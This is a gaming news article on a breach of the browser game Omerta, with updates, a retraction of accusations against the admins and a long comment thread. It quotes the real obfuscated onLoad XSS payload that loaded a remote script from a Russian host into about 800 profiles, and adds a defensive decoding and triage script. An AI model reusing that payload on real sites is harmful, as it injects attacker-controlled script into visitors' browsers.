22-09 [Upd #2] Omerta hacked
Author: sbanks
Last updated: 4590d 17h 1m 16s ago by LL
Comments: 164
Views: 62,273
Votes: 0 (0 average)
Version: 3.2
article
Last weekend Omerta had some downtime. The admins posted news that there was something wrong with the server: a hardware problem, as Brando states.

Barafranca News: Connection problems - fixed

By Brando: There was a hardware problem which was solved by switching that machine off.

We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.

Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.

Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.


In reality, hackers had access to the database of Omerta. Due to the lack of proper coding on the hitlist page, hackers were able to run a "query" and get into the database of Omerta.

Result? All the information you could wish for "could" have been downloaded. This includes: successors, bullet amounts, passwords (MD5 hashed), emails, testaments... everything!

After Brando's news post, the hackers got kind of "pissed/annoyed" that the admins were trying to cover up what was happening and decided to go public with the information.

They wrote a small tool which would change all profiles in-game, about the same thing as happened versions ago (Stidda <-> Barafranca).

They reached about 800 profiles before it was noticed, and the admins disabled images on profiles again.

Barafranca News: Removed Img(s)

onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)


Translation:
Once the page has loaded, create a script element, set its source to http://a.itsr.ru/knas2.js, and append it to the head of the page.


This script loaded an unknown JavaScript file onto the profiles, which could have been used to cause harm once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the hackers' intentions.
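
The translation above can be checked without running the handler. The following is an added example, not code from the original article or from Omerta: it statically decodes the String.fromCharCode calls in the quoted handler and flags the traits that make such profile markup suspicious. The names deobfuscate, triage, SAMPLE_HANDLER and BENIGN_SAMPLE are assumptions made for this sketch, and the benign sample is constructed.

```javascript
// Added example, not code from the article or from Omerta.
// Static triage of user-supplied profile markup: the input is only
// pattern-matched and decoded, never evaluated.

// The handler quoted in the article, kept as an inert string.
const SAMPLE_HANDLER =
  'onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));' +
  'm.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, ' +
  '117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( ' +
  'String.fromCharCode(104,101,97,100))[0].appendChild(m)';

// Constructed benign profile image for comparison (placeholder host).
const BENIGN_SAMPLE = '<img src="http://example.invalid/avatar.png" alt="me">';

// String.fromCharCode(<decimal list>), tolerating the stray whitespace
// seen in the quoted payload.
const FROM_CHAR_CODE =
  /String\s*\.\s*fromCharCode\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)/g;

// Inline event-handler attribute such as onload= or onerror=.
const EVENT_ATTR = /(?:^|\s)on[a-z]+\s*=/i;

// Replace every fromCharCode call with the string literal it stands for.
// Returns the rewritten text and the list of decoded strings.
function deobfuscate(source) {
  const decoded = [];
  const text = source.replace(FROM_CHAR_CODE, (_match, list) => {
    const value = list
      .split(',')
      .map((n) => String.fromCharCode(Number(n.trim())))
      .join('');
    decoded.push(value);
    return JSON.stringify(value);
  });
  return { text, decoded };
}

// Flag the traits of the handler described in the article.
function triage(markup) {
  const { text, decoded } = deobfuscate(markup);
  const findings = [];
  if (EVENT_ATTR.test(markup)) findings.push('inline-event-handler');
  if (decoded.length > 0) findings.push('charcode-obfuscation');
  if (/createElement\(\s*"script"\s*\)/i.test(text)) {
    findings.push('script-element-created');
  }
  const urls = decoded.filter((s) => /^https?:\/\//i.test(s));
  if (urls.length > 0) findings.push('remote-url');
  return { findings, urls, decoded, text };
}

// Running this file prints the decoded view of both samples.
for (const sample of [SAMPLE_HANDLER, BENIGN_SAMPLE]) {
  const { findings, urls, text } = triage(sample);
  console.log(findings.length ? findings.join(', ') : 'clean');
  if (urls.length) console.log('  loads:', urls.join(', '));
  if (findings.length) console.log('  decoded:', text);
}
```

Matching like this is only useful for reviewing profile content that is already stored; the fix on the server side is to strip or escape attributes in user-supplied image markup so that no handler reaches the page.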

Update:
We have now heard that the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.

Update:

As further proof, the hackers have released a list of 515 users with their set testament.

They also released the Global Vars of the Barafranca server.

Update 28/09:

After six days of silence in the admins' latest news section, during which our invitation to comment on this article with the story from the admins' point of view was ignored, the crew of this site has been G-lined for an undefined amount of time with the message to "contact Brando". The in-game accounts of our crew have also been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.

Later in the day, a statement was released on Omerta in which Bramblerose states that last Thursday testament info was indeed obtained through an XSS exploit. Today they have taken measures to protect the players whose data was obtained.

They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.

Update:

One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user IDs that were the successors of the corresponding families at the time of the hack, which is further proof that the database was completely accessible.

Update 30/09:
We're sorry for connecting the downtime with the hacks; we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems, and thus we retract this accusation.

We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article, and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused them extra worries or made them spend more time on damage control.
comments

Rix Netherlands (13:02:49 - 29-09)
Shizzz at 12:55:47 on 29/09:
tbh who gives a shit about a hack of omerta? Everything can be hacked if it's done by proper people, nothing to be ashamed of.
I don't get it why 1. beyond makes such a big thing about it and 2. Brando doesn't want to admit it. It happened, don't give them attention and they will stop
We didn't make a big thing about it from the start, we just reported it, as any newssite would do and does.
Shizzz Belgium (12:55:47 - 29-09)
tbh who gives a shit about a hack of omerta? Everything can be hacked if it's done by proper people, nothing to be ashamed of.
I don't get it why 1. beyond makes such a big thing about it and 2. Brando doesn't want to admit it. It happened, don't give them attention and they will stop
Rix Netherlands (10:58:26 - 29-09)
Anonymous at 10:19:20 on 29/09:
Brando Omerta NB I offered them a full interview over a week ago. You should be asking them why you did not yet get to read it... I would not suggest that they are 'covering it up', however.
In case someone is wondering, here is the answer for you guys:
Rix at 10:19:38 on 26/09:
Dear Brando,

We always like to take interviews or in any other way put anything up on our site other than the plain war articles. However, being that most of us do not like this version at all and since most of us are busy with real life things, such as school or work, or working on other projects, we, at this moment, do not have the time for an interview, even though we would really like to hear the admin's side of the story. For example, out of our current 8-11 crew members, only 2 are online at least once a day, and only 5 once a week. This is our fault, we know, but blaming us for it is not going to change everything.

Therefore, I kindly suggest to have patience until both parties (Omerta crew and OBN crew) have time or, when you want to have your reply out in the open as soon as possible (which I would understand you want in this certain situation), use your extensive freedom of speech on our site and write an excessive comment including explanations on how these three, for us, coherent, events (downtime, database setup leak and profiles infected with code) could have taken place or a description on what really happened.

Furthermore, I would like to repeat a previous notice of mine that we normally would remove posts including excessive name calling and insults on our journalistic integrity. Please see this as your second warning. Thank you in advance.
Anonymous (10:19:20 - 29-09)
Hiring some new people wont change things if their boss remains using the same logic, planning and more importantly communication.
Brando is to blame, he started an crusade calling all and everything related to these hacks complete fakes.
Then he has to withdraw that statement when Bramble decides to cave in just a little and admit a hack last week for a short window.
Wich we all know is bullshit but ok, its a start right?

And then the hackers released their final proof, a full list of succesors and second succesors, and altho a few weeks old the data proved to be extremely relevant, even now after some fams might have changed them around etc.
And still he's calling fake, hoax and what not.
Read his facebook lately?
Ill give you the cliffnotes:

Brando Omerta
has spent most of the last 2 days waiting for the 'Journalists' of Omerta Beyond to get in touch. Last night I lost my patience and we banned them all.

Brando Omerta Since then they have responded but the key person has not done so satisfactorily. Once he does we can all move on.

Brando Omerta ‎<name> would you like it if I called you 'a liar'? I am pro freedom-of-speech and anti-censorship. This is not about censorship. I won't say any more about it until I have an intelligent response from their side.

Brando Omerta I have not banned their site and will remove all of the personal bans once they wake up and smell the coffee. Nothing personal. Just trying to get their attention.

Brando Omerta NB I offered them a full interview over a week ago. You should be asking them why you did not yet get to read it... I would not suggest that they are 'covering it up', however.

Brando Omerta News I don't mind. Made up shit about me and my colleagues I do.

And now:
Brando Omerta
is leaving you amidst rancour and intrigue. Have a great day!

You can hardly blame the people working under him for stuff if thats the way things are done around there. And Brando was perfectly capable of posting here in the start, yet suddenly he seemed to forget that, Rix posted here dozens of times for him to respond to his email, since the second line of his bann "or contact us on irc' is kinda hard to do while g-lined..
Anonymous (09:56:35 - 29-09)
Anonymous at 18:47:53 on 28/09:
@ Steve/Brando: These ranting fits does nothing but alienate the community that (through donations) helps feed your family. Why not start treating this community as the paying customers we are? Of course there are two sides to every story and I also get tired of the flaming etc... but the latest outbursts on this site along with a history of poor communication has simply alienated your customer base. I stopped donating and only log in for nostalgic reasons - not because I am tired of the game or the friends I have made here but because I will not continue to buy a product with inconsistent service and care. That is my only but very significant power as a consumer. The community is all that is keeping your business alive at the moment. You offer a service and consumers have expectations. This hardly matches up anymore. You and your crew have years of "abusive" (strong word hence the "") behavior towards your customers to rectify and it is just not happening. I became a fan of your proactive approach to scripting but you are lacking an engaged and consistent group of community managers. And you need to refill that prescription of Valium. Talk to your community. Don't treat us like vermin. Make me a customer again.

Just my advice from one business mind to another.


@ Rix and crew: You derelicts! Keep it up and keep it honest. :)

Gigollo (I would not have posted Anonymous if I could just remember that %@&!* password)

Well said! This all boils down to negligence from the management; Please, steve, i beg of you, hire some proper people to handle this game. The ones currently "employed" (do you really pay em for that work?!) are way too emtionally involved in the game and just as dirty as the players trying to be mafia. This aint the red cross, if you expect profit people are going to expect something back. And look! You have all the possibilities in the world mate, just take this talanted bunch of programmers, who dedicated their time and effort into making this newssite, makig up for the poor reporting from "your" side. Throw them a bone man and make friends damnit! You cant shun people for telling the truth, or are you the biggest crook of us all?
Clam (09:09:19 - 29-09)
raviolio at 01:06:52 on 29/09:
read? at 00:37:47 on 29/09:
raviolio at 00:17:43 on 29/09:
Anonymous at 23:14:57 on 28/09:
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

i dont see a reset coming anytime soon. the game isnt locked fams that were shot down have come back up already and preparing to shoot again.

did you even read the article ? barafranca got hacked all info is out there.. they know all the successors, they know how many bullets everyone has etc. etc.

thats reason enough for a reset.
yeah i read it. If all that info is out there, it seems more or less even to all fams involved. If the info gained from this is so important, I would expect some shooting soon. But I dont think much will change at all. I think some people just want a reset and jump and anything that is remotely related.

Oh please! Stop whining about bloody reset! Want reset? Do something about .com! Fight, war, kill, suicide! All you guys want is reset every few months after you and your family get raped... Well, no! No reset now or anytime soon - start wars and riot for fucks sake, you and people alike you have made this game so boring for that reason - if you can't win easily, ask for reset! LAME!!
Clam (09:06:37 - 29-09)
One hell of an article! I had no idea what was going on until I've read this now!

Admins can suck it, they've been revealed and exploited!
Anonymous (08:49:27 - 29-09)
ok so now what ? you get like free DC's for a month Rix and co ? lol
I notice they admit they are wrong......

they fail this hard and have a go at you guys akilling , freezing and g-lining only to finally realise(partially atm) that they got hacked to still deny alot of it .... so when in a week they front up and admit they were wrong

i hope you ask for a public apology to be posted on omerta forums latest news or something because he(Brando) pretty much attacked your news site with untrue remarks about the site and abusing people/persons involved with the leak.
( which is great news report btw great work ;) )

im not involved at all but i wanna see them publicly apologise and admit they were wrong.
and if people are unaware or just to unsure whats going on be sure that the post indicates that emails and or passwords MAY need to be changed

now this is unacceptable of course firstly to lie then to cover it up with bullshit to "keep them happy" preety much it seems
i bet those " " words were used in discussing this amongst yourselfs(admins/crew) pathetic effort and to you Steve/Brando you really gotta admit your mistakes and apologise here .... in my opinion there may be more lost players to yet more Admin/Crew Fails ... be sure to pat yourselves on the back when this games dead and gone .. because you gonna cause it all yourself the way you're going

forget scripts and dupes .... we got stupid admins on our hands :')

finally gonna front up to one of your fuck ups Brando ???????? we await the answer and if the answer is no i want a decent answer without abuse explaning why please :)
Anonymous (01:40:49 - 29-09)
Omerta the number 1 retard game, that every e-peen kid plays.
raviolio (01:06:52 - 29-09)
read? at 00:37:47 on 29/09:
raviolio at 00:17:43 on 29/09:
Anonymous at 23:14:57 on 28/09:
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

i dont see a reset coming anytime soon. the game isnt locked fams that were shot down have come back up already and preparing to shoot again.

did you even read the article ? barafranca got hacked all info is out there.. they know all the successors, they know how many bullets everyone has etc. etc.

thats reason enough for a reset.
yeah i read it. If all that info is out there, it seems more or less even to all fams involved. If the info gained from this is so important, I would expect some shooting soon. But I dont think much will change at all. I think some people just want a reset and jump and anything that is remotely related.
read? (00:37:47 - 29-09)
raviolio at 00:17:43 on 29/09:
Anonymous at 23:14:57 on 28/09:
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

i dont see a reset coming anytime soon. the game isnt locked fams that were shot down have come back up already and preparing to shoot again.

did you even read the article ? barafranca got hacked all info is out there.. they know all the successors, they know how many bullets everyone has etc. etc.

thats reason enough for a reset.
raviolio (00:17:43 - 29-09)
Anonymous at 23:14:57 on 28/09:
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

i dont see a reset coming anytime soon. the game isnt locked fams that were shot down have come back up already and preparing to shoot again.
Anonymous (23:14:57 - 28-09)
Anonymous at 20:54:23 on 28/09:
Anonymous at 20:48:20 on 28/09:
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)

Its 2 weeks like the guy said. It was 100% correct back then.


it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks

The info is valid, the hackers who published this list just did so to prove that the database has been compromised already, they arent the same ones that this article is originally about.
So the time-frame might be a bit off since this hack took place a while ago, thus the list is somewhat older. But it still proves that people have had access to the omerta database structure in the past thus any statement claiming otherwise is plain false.

Todays newspost actually takes the piss with the entire subject, they found out today that last week for 30minutes their testament page got 'hacked' but they closed that already so all is fine?
Who believes such a bs story.
It will be interesting to see if Brando finally admits hacks did happen in the past which where able to parse actual 'hidden' data and prolly got acces to the entire thing.
Denial is prolly the way he goes tho, which makes him just as worse as anyone that ever had a function in the crew before he stepped up which he blamed for everything.

Solution?:
Admit the fuckup, fix the leaks, reset the 3.2 versions.
He might do part 3, but part 1 and 2 are a whole new ballgame.

Rix Netherlands (21:59:34 - 28-09)
Anonymous at 21:30:02 on 28/09:
sbanks at 21:00:11 on 28/09:
Anonymous at 20:55:33 on 28/09:
maybe a stupid question but i dont really understand, what happened and what effect does it have?

the hackers have all successors of every family, all bullet amounts, basically everything, they know successors, md5 hashed passwords, they know what bodyguards you have, what email you used when you regged your account.

basically EVERYTHING.

this is confirmed?
We don't know, and unless they decide to publish the whole database we will never know. But they definitely had the opportunity, and in terms of cybercrime that is just as good. Since cybercrime is so unique it is hard to compare it with something out of real life, but you can compare it with a bank of which the front doors are open and the safe door is closed but unlocked and all the employees are blindfolded and they don't know how much money is inside the safe. Random people could walk in the bank and walk past the clerks and check the safe door and see it's unlocked, then open it and take money, but since we don't know how much money is in it we will never know if and how much they took.

The bank is Omerta, free for players unless the employees decide to close it.
The employees are the Omerta crew, in control but probably can't see if someone tries to attempt something, since that's just how cybercrime works in some situations.
The safe is the database.
The door of the safe is the connection between the pages you see in front of you and the database.
The money inside the safe is the data which includes all our passwords and emails and maybe even telephone numbers.

Now in this hypothetical situation add the given fact that we know that someone has tried to open the safe door and went inside.
rkellylovespee United States (21:49:55 - 28-09)
Anonymous at 21:48:56 on 28/09:
so are they gonna act like nothing happened?

Yes.
Anonymous (21:48:56 - 28-09)
so are they gonna act like nothing happened? or will this lead to a reset?
Anonymous (21:30:02 - 28-09)
sbanks at 21:00:11 on 28/09:
Anonymous at 20:55:33 on 28/09:
maybe a stupid question but i dont really understand, what happened and what effect does it have?

the hackers have all successors of every family, all bullet amounts, basically everything, they know successors, md5 hashed passwords, they know what bodyguards you have, what email you used when you regged your account.

basically EVERYTHING.

this is confirmed?
sbanks Guatemala (21:00:11 - 28-09)
Anonymous at 20:55:33 on 28/09:
maybe a stupid question but i dont really understand, what happened and what effect does it have?

the hackers have all successors of every family, all bullet amounts, basically everything, they know successors, md5 hashed passwords, they know what bodyguards you have, what email you used when you regged your account.

basically EVERYTHING.
rkellylovespee United States (21:00:05 - 28-09)
Confirms my 1st and 2nd successor exactly as it stands now even though my 2nd successor is in the middle of the pack of brugs and has never held a position of any sort in the family.
Anonymous (20:59:19 - 28-09)
Anonymous at 20:55:33 on 28/09:
maybe a stupid question but i dont really understand, what happened and what effect does it have?
well if your don is shot, he can set 2 successors that will become don if he has been shot

so for example i die,
first successor = X
2nd one = Y

if they shoot X 2sec before me (i die also) Y is capable to take over the DON spot and set 2 persons again A & B for example,

but in case of war, they shoot X & Y 1min before me, directly after that me (as don)
the family is down and the HQ is lost


to make it really easy to explain